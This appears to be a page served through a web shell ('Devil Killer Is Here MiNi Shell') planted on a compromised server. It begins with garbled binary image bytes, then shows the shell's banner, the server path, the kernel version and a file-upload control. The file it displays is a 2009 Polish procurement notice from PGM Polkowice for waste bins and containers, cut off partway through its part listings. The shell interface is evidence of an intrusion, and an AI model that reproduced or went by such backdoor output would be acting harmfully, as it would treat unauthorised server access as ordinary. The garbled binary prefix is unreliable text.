JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/97884-N-2009.html

<p class="kh_header"><b>Polkowice: Dostawa pojemników na odpady: 

Zadanie nr 1: Dostawa pojemników plastikowych o pojemności 60 l - szt. 75
Zadanie nr 2: Dostawa pojemników plastikowych o pojemności 120 l - szt. 75
Zadanie nr 3: Dostawa pojemników metalowych o pojemności 1100 l - szt. 80
Zadanie nr 4: Dostawa kontenerów KP7 zamkniętych - szt. 4
Zadanie nr 5: Dostawa kontenera na szkło do selektywnej zbiórki odpadów - szt. 1</b><br>
<b>Numer ogłoszenia: 97884 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Miejskiej Sp. z o.o. , ul. Dąbrowskiego 2, 59-100 Polkowice, woj. dolnośląskie, tel. 076 8462911, faks 076 8462960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgm-polkowice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pojemników na odpady: 

Zadanie nr 1: Dostawa pojemników plastikowych o pojemności 60 l - szt. 75
Zadanie nr 2: Dostawa pojemników plastikowych o pojemności 120 l - szt. 75
Zadanie nr 3: Dostawa pojemników metalowych o pojemności 1100 l - szt. 80
Zadanie nr 4: Dostawa kontenerów KP7 zamkniętych - szt. 4
Zadanie nr 5: Dostawa kontenera na szkło do selektywnej zbiórki odpadów - szt. 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest dostawa pojemników na odpady:

Zadanie nr 1: Dostawa pojemników plastikowych o pojemności 
60 l - szt. 75

Charakterystyka Produktu:
 
Tworzywo:                  PE - HD polietylen niskociśnieniowy wysokiej gęstości.
Kolor:                          zielony
Kółka:                          na dwóch kółkach, kółka sprawdzone, z zatrzaskiem.
Stan:		            fabrycznie nowe

Okres gwarancji:	  12 miesięcy


Pojemniki powinny posiadać:
Atest PZH
Zgodność z normą EN-PN 840.

Termin dostawy 5 tygodnie, licząc od dnia podpisania umowy.


Zadanie nr 2: Dostawa pojemników plastikowych o pojemności 120 l - szt. 75

Charakterystyka produktu:
Tworzywo:             PE - HD polietylen niskociśnieniowy wysokiej gęstości.
Kolor:                     zielony.
Kółka:                     na dwóch kółkach, kółka sprawdzone, z zatrzaskiem.
Stan:		         fabrycznie nowe
Okres gwarancji:   12 miesięcy

Pojemniki powinny posiadać:
Atest PZH
Zgodność z normą EN-PN 840

Termin dostawy 2 tygodnie, licząc od dnia podpisania umowy.


Zadanie nr 3: Dostawa pojemników metalowych o pojemności 1100 l - szt. 80

Charakterystyka produktu:

1.	Pojemniki muszą być wykonane zgodne z normami polskimi i europejskimi.
2.	Konstrukcja pojemników musi być dostosowana do rozładunku przez śmieciarki wyposażone we wsyp mechaniczny oraz posiadać zabezpieczenia przed samoistnym spadkiem z wideł.
3.	Pojemniki muszą posiadać rączki - uchwyty ułatwiające przemieszczanie pojemnika i otwieranie pokrywy.
4.	Musi posiadać klapę 
5.	Pojemniki mają posiadać po 4 kółka jezdne o wymiarze fi 200. 
6.	Kółka muszą być metalowo-gumowe z obrotnicami umożliwiającymi swobodne manewrowanie. Oponki powinny być z pełnej gumy
7.	Pojemniki muszą być w kolorze zielonym z napisem ( wielkość liter 10 cm, kolor biały)


8.	Okres gwarancji: 12 miesięcy
9.	Stan: fabrycznie nowe


Termin dostawy (2 dostawy):   
a)	40 szt. - 2 tygodnie , licząc od dnia podpisania umowy.
b)	40szt. - 5 tygodni, licząc od dnia podpisania umowy.

 
Zadanie nr 4: Dostawa kontenerów KP7 zamkniętych - sz 4   

Kontenery muszą być wykonane zgodnie z normami polskimi i europejskimi oraz spełniać następujące wymagania :
1.	Dno kontenera wykonane z blachy stalowej o grubości co najmniej 3 mm wzmocnione
       poprzeczkami.
2.	Ściany boczne wykonane z blachy stalowej o grubości co najmniej 2 mm. Kontener musi być wzmocniony kształtownikami i tłoczeniami w ścianach. Blokady, zamknięcia i elementy (hak główny i elementy zaczepne boczne) zgodne z obowiązującymi normami. 
3.	Przejście dna w ściany boczne skośne ( wysokość skosu 100 mm).
4.	Rama nośna wykonana z ceownika walcowanego na gorąco co najmniej 180 mm.
5.	Ściany boczne wzmocnione górnym wieńcem z profilu 100*50*3 (spoiny na długości co najmniej 50% długości połączenia wieńca) zaopatrzone w haczyki do mocowanie plandeki.
6.	Łączenia blach wykonane spawem ciągłym.
7.	Ściana przednia wzmocniona na wysokości haka blachą o grubości co najmniej 5mm
8.	Tylną ścianę kontenerów stanowić muszą drzwi jednoskrzydłowe otwierane od dołu z zamknięciem i zabezpieczeniem.
9.	Pod tylną krawędzią zamontowane dwie rolki jezdne o długości co najmniej 180mm i średnicy 160 mm na łożyskach bezobsługowych.
10.	Szerokość kontenera1730 mm
11.	Wysokość kontenera 1500 mm
12.	Długość kontenera 3450 mm
13.	Kontenery piaskowane malowane dwukrotnie farbą podkładową oraz lakierowane w
       kolorze zielonym RAL 6029
14.	Kontenery zakryte muszą posiadać co najmniej 6 otworów wrzutowych po trzy z każdej strony o wymiarach 520 x 680mm. Każda pokrywa powinna być wyposażona w zawiasy uniemożliwiające odchylenie pokrywy do kąta większego niż 120°.
15.	Kontenery musi być zaopatrzone w tabliczki znamionowe z oznaczeniem : nazwa producenta, pojemność i dopuszczalna ładowności, roku produkcji.
16.	Kontenery muszą zawierać napis, który jest podany niżej, wielkość liter 10 cm:

PGM Sp. z o.o.
Polkowice
Tel. 076/ 846- 29- 44


17.	Oświadczenie, że kontener został wykonany zgodnie z przepisami BHP i Unii Europejskiej
18.	Okres gwarancji: 12 miesięcy.
19.	Stan: fabrycznie nowe
20.	Do dostarczonych kontenerów musi być załączona karta gwarancyjna.

Termin dostawy 5 tygodni, licząc od dnia podpisania umowy.



Zadanie nr 5: Dostawa kontenera na szkło do selektywnej zbiórki odpadów - szt. 1   

Kontenery musi być wykonane zgodnie z normami polskimi i europejskimi oraz spełniać następujące wymagania :
1.	Kontener z blachy St3s o wymiarach 5000 x 2500 x h=2100mm ,
2.	Pojemność kontenera ok. 26 m3
3.	Hak na wysokości - DIN 30722
4.	Płozy ceownik hutniczy 180 mm, rozstaw 1015 mm jak KP7,
5.	Plandeka rozwijana na szerokości kontenera na zwijadle,
6.	Tylną ścianę kontenera stanowić muszą drzwi jedno skrzydłowe otwierane od dołu z zamknięciem oraz zabezpieczeniem otwieranym z boku,
7.	Przegroda wewnętrzna ruchoma ,otwierana od dołu z zabezpieczeniem     uniemożliwiającym samoczynne otwarcie przegrody podczas rozładunku,
8.	Przejście dna w ściany boczne pod kątem prostym,
9.	Drabinki po obu stronach haka,
10.	Rolki jezdne dwie sztuki na łożyskach bez obsługowych, rozstaw wewnętrzny rolek 1550 mm.
11.	Poszycie boczne z blachy o grub. 2,5 mm,
12.	Podłoga z blachy o grub. 3 mm,
13.	Malowany farbą podkładową i nawierzchniową kolorem wg RAL 2011.
14.	Stan: fabrycznie nowy
15.	Okres gwarancji: 12 miesięcy

Termin dostawy 5 tygodni, licząc od dnia podpisania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 44.61.33.00-3, 44.61.90.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zadanie nr 1 :  150 PLN ( słownie:  sto pięćdziesiąt  złotych).
Zadanie nr 2:   150 PLN  ( słownie:  sto pięćdziesiąt złotych ).
Zadanie nr 3:   1500 PLN ( słownie:  jeden tysiąc pięćset).
Zadanie nr 4:   400 PLN (słownie: czterysta złotych).
Zadanie nr 5:   200 PLN (słownie: dwieście złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> C.2.1. Wykonawca składający ofertę nie może podlegać wykluczeniu z postępowania o zamówienie publiczne ( art. 22 ust.1 pkt 4 ) 
C.2.2. Wykonawca winien spełniać warunki, o których mowa w art. 22 ust. 1 pkt  1-3   ustawy  w niżej wymienionym zakresie:
1) posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
W celu potwierdzenia spełnienia powyższego warunku Wykonawca składa w załączniku nr 1 Formularza ofertowego następujące dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , w zakresie objętym zamówieniem.
b) zaświadczenie z Urzędu Skarbowego i Zakładu Ubezpieczeń Społecznych potwierdzający odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat ,składek itp. 

2) posiadać niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia ( oświadczenie woli, zgodnie z przepisami Kodeksu Cywilnego) tj. 
 W ciągu ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego Wykonawca zrealizował:
Dla zadania: Zadanie nr 1 i 2:  minimum 1 dostawy pojemników plastikowych  o pojemności 60l lub 120l na odpady o wartości co najmniej 5.000; dla zadania nr 3: minimum 3 dostawy pojemników metalowych o pojemności na odpady 1100 l o wartości co najmniej  20.000 każda; dla zadania nr 4: 2 dostawy kontenerów KP7 zamkniętych o wartości co najmniej 5.000 każda; dla zadania nr 5: minimum 2 dostawa kontenera na szkło do selektywnej zbiórki odpadów o wartości co najmniej 7000 każda. Jeżeli wykonawca prowadzi działalność krócej niż trzy lata to wykazuje wykonanie zamówień za okres prowadzenia  działalności. 
	                Informacje, o których mowa powyżej należy wykazać w załączniku nr 4 Formularza ofertowego.
Dokumenty ( protokoły odbioru, referencje itp. ) winny potwierdzać należyte wykonanie zrealizowanych zamówień wykazanych w załączniku nr 4 do Formularza ofertowego. Brak powyższych dokumentów jest równoznaczne z niespełnieniem warunku udokumentowania wiedzy i doświadczenia niezbędnego do wykonania zamówienia.

3) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
	a) Wykonawca musi posiadać na dzień złożenia ofert środki finansowe lub zdolność kredytową na minimum 50 % wartości ceny  ofertowej brutto . Wysokość posiadanych środków lub zdolność kredytową należy udokumentować opinią z banku prowadzącego rachunek Wykonawcy. Informację dotyczące określenia, o której mowa należy zamieścić w zał. Nr 3 Formularza ofertowego) 
	b) Wykonawca musi posiadać na dzień złożenia oferty ubezpieczenie  odpowiedzialności cywilnej ( polisę OC) z tytułu prowadzonej działalności w wysokości gwarancyjnej co najmniej 50.000 PLN. Polisę, o której mowa Wykonawca dołącza jako zał. Nr 3 Formularza ofertowego. 
	
	 
	C.2.3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego ( art. 23 ust. 1 ustawy)  tzw. konsorcjum. W przypadku złożenia wspólnej oferty strony konsorcjum ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, na podstawie art. 23  ustawy. 
	 Oferta składana przez podmioty występujące wspólnie, powinna spełniać łącznie minimalne warunki podmiotowe dotyczące  Wykonawców, zamieszczone w pkt. C 2.  
	Odrębnie każdy z partnerów konsorcjum  zobowiązany jest do przedstawienia wymaganych dokumentów, zaświadczeń i oświadczeń, w celu potwierdzenia  spełnienia warunków zawartych w art. 22 ust. 1 pkt 1-4.
	
	Oświadczenia i dokumenty muszą potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż upływa termin złożenia oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków wymaganych w niniejszym postępowaniu o udzielenie zamówienia publicznego, Wykonawca zobowiązany jest złożyć następujące dokumenty:
	
	Wypełniony i podpisany FORMULARZ OFERTOWY (wzór w rozdziale E niniejszej SIWZ), zawierający następujące załączniki: 
1)	Załącznik nr 1 - Oświadczenia wykonawcy - część 1, w którym znajdują się następujące oświadczenia: 
-	Oświadczenie, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 22 ust. 1 pkt 4 i 24 Ustawy z dnia 29 stycznia 2004 roku : Prawo zamówień publicznych ,
-	Oświadczenie, że Wykonawca posiada uprawnienia do wykonania określonej działalności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
-	Oświadczenie, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub posiada pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego osób zdolnych do wykonania zamówienia,
-	Oświadczenie, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

		W przypadku złożenia oferty przez konsorcjum, spółkę cywilną lub jawną, wymagane  jest złożenie powyższego oświadczenia - odrębnie przez każdego partnera konsorcjum  lub wspólnika spółki cywilnej.
	Do załącznika nr 1 należy dołączyć  niżej wymienione dokumenty (w formie oryginału lub poświadczonej za zgodność z oryginałem kserokopii) :
a)	aktualny (tzn. zawierający dane od ostatniej zmiany) odpis lub zaświadczenie z właściwego organu rejestrowego, stwierdzającego status prawny lub formę prawną.  Profil działania Wykonawcy musi odpowiadać przedmiotowi zamówienia. Odpis lub zaświadczenie musi  zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy.  
      W przypadku Wykonawcy będącego spółką cywilną obowiązuje załączenie umowy spółki       cywilnej i zaświadczenia o zgłoszeniu działalności  gospodarczej każdego uczestnika spółki.  
W przypadku złożenia oferty przez konsorcjum, wymagane jest złożenie dokumentów, o których mowa wyżej, przez każdego partnera konsorcjum odrębnie. 
Odpisy lub zaświadczenia muszą być wystawiane nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
b)	zaświadczenie z Urzędu Skarbowego o nie zaleganiu z podatkami związanymi z działalnością Wykonawcy lub przewidziana prawem zgoda na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności Wykonawcy lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 m-cy przed upływem terminu składania ofert. 
c)	 zaświadczenie z ZUS lub KRUS, o nie zaleganiu ze składkami na ubezpieczenie społeczne lub zdrowotne albo przewidziana prawem zgoda na zwolnienie, odroczenie płatności lub rozłożenie na raty zaległych płatności Wykonawcy, wystawione nie wcześniej niż 3 m-cy  przed upływem  terminu składania ofert.
	W przypadku złożenia oferty przez konsorcjum, spółkę cywilną , wymagane jest złożenie powyższych dokumentów - odrębnie przez każdego partnera konsorcjum, wspólnika spółki cywilnej.

2)	Załącznik nr 2 - Oświadczenia wykonawcy - część 2, w którym znajdują się następujące oświadczenia:

-	Oświadczenie, że Wykonawca zapoznał się ze szczegółowymi warunkami przetargu zawartymi w SIWZ w tym  z wzorem umowy i przyjmuje je bez zastrzeżeń, 
-	Oświadczenie, że Wykonawca posiada konieczną wiedzę wymaganą do przygotowania oferty oraz realizacji zamówienia w określonym czasie.
-	Deklaracja Wykonawcy, że wszystkie oświadczenia i informacje zamieszczone w formularzu ofertowym (ofercie) są kompletne, prawdziwe i dokładne w każdym szczególe.
-	Upoważnienie Wykonawcy dla Zamawiającego lub jego upoważnionych przedstawicieli do przeprowadzenia wszelkich badań mających na celu sprawdzenie oświadczeń, dokumentów i przedłożonych informacji oraz do wyjaśnienia finansowych i technicznych aspektów dotyczących złożonych dokumentów.
-	Upoważnienie Wykonawcy dla każdej osoby publicznej, banku lub przedsiębiorstw  wymienionych w  FORMULARZU OFERTOWYM (ofercie) do dostarczenia stosownych informacji uznanych przez Zamawiającego za konieczną i wymaganą w celu sprawdzenia oświadczeń i informacji zawartych w naszej ofercie.
-	Nazwiska i stanowiska osób, z którymi można się kontaktować w celu uzyskania dalszych informacji, jeżeli będą wymagane. 

	Do załącznika nr 2 należy dołączyć niżej wymienione dokumenty (w formie oryginału lub poświadczonej za zgodność z oryginałem kserokopii) :
a)	Pełnomocnictwo w oryginale do podpisania oferty. (Pełnomocnictwo nie jest wymagane jeżeli podpisujący jest lub są właścicielami firmy lub jeżeli są oni wymienieni z imienia i nazwiska w odnośnym dokumencie rejestracyjnym).
	
	3) Załącznik nr 3 Dowody na posiadanie potencjału ekonomicznego .
	Do załącznika nr 3 należy dołączyć niżej wymienione dokumenty (w formie oryginału lub poświadczonej za zgodność z oryginałem kserokopii):
	określające pozycję finansową-ekonomiczną wykonawcy, takie jak: 
a)	Informacja z  banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wielkość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiana nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert. 
b)	polisa odpowiedzialności cywilnej w zakresie prowadzonej działalności.

	4) Załącznik nr 4. Informacje na temat doświadczenia. 
	W załączniku należy umieścić szczegóły dotyczące zrealizowanych dostaw ( wg wymogu rozdz. C.2. pkt.2.2 ppkt.2) SIWZ ), informacji na temat Zamawiających, z którymi można się będzie skontaktować w celu uzyskania dalszych szczegółów na temat tych robót. 
	Do załącznika nr 4 należy dołączyć niżej wymienione dokumenty (w formie oryginału lub poświadczonej za zgodność z oryginałem kserokopii) :
Do każdej wyszczególnionej pozycji w załączniku nr 4 należy dołączyć pozytywną opinię   ( referencje, protokoły odbioru itp. ) Zleceniodawcy. 

	
	
	5) Załącznik nr 5  Charakterystyka oferowanego przedmiotu zamówienia  - ( zgodnie z parametrami opisanymi w B.1 niniejszej specyfikacji istotnych warunków zamówienia) 
	W załączeniu: katalogi, charakterystyki itp. 
	

6) Załącznik nr 6- Gwarancja 

Jeżeli  Wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza terytorium Rzeczypospolitej Polskiej  to  przedstawia    on dokumenty, o których mowa  w pkt C.3.1. ppkt1 SIWZ) wystawione w kraju , w którym ma siedzibę lub miejsce zamieszkania , potwierdzające, że:
	            a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	            b) nie zalega z uiszczeniem podatków, opłat składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienia , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
	            c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
	
	Jeżeli  w  kraju,  w  którym  Wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  nie wydaje  się  dokumentów  o  których  mowa w  pkt.C.3. SIWZ można  je zastąpić oświadczeniem Wykonawcy, złożonym przed notariuszem, właściwym organem sądowym, administracyjnym, organem  samorządu  zawodowego  lub  gospodarczego ,  w  którym dana osoba  ma  siedzibę  lub  miejsce zamieszkania. Powyższe  dokumenty  i  oświadczenia  są  składane  w  formie odpisu, wypisu,  wyciągu  lub  kopii,  
	przetłumaczonych  na  język  polski, poświadczonych  przez  polskie  placówki  konsularne,  stosownie  do obowiązujących  przepisów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pgm-polkowice.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pgm-polkowice.com.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 11:30, miejsce: Przedsiębiorstwo Gospodarki Miejskiej sp. z o.o. ul. Dąbrowskiego 2 59-100 Polkowice pok. nr 9 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pojemników plastikowych o pojemności 60l-szt.75.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka Produktu:
 
Tworzywo:                  PE - HD polietylen niskociśnieniowy wysokiej gęstości.
Kolor:                          zielony
Kółka:                          na dwóch kółkach, kółka sprawdzone, z zatrzaskiem.
Stan:		            fabrycznie nowe

Okres gwarancji:	  12 miesięcy


Pojemniki powinny posiadać:
Atest PZH
Zgodność z normą EN-PN 840.

Termin dostawy 5 tygodnie, licząc od dnia podpisania umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 44.61.33.00-3, 44.61.90.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa pojemników plastikowych o pojemności 120 l - szt. 75.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka produktu:
Tworzywo:             PE - HD polietylen niskociśnieniowy wysokiej gęstości.
Kolor:                     zielony.
Kółka:                     na dwóch kółkach, kółka sprawdzone, z zatrzaskiem.
Stan:		         fabrycznie nowe
Okres gwarancji:   12 miesięcy

Pojemniki powinny posiadać:
Atest PZH
Zgodność z normą EN-PN 840

Termin dostawy 2 tygodnie, licząc od dnia podpisania umowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 44.61.33.00-3, 44.61.90.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pojemników metalowych o pojemności 1100 l - szt. 80.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka produktu:

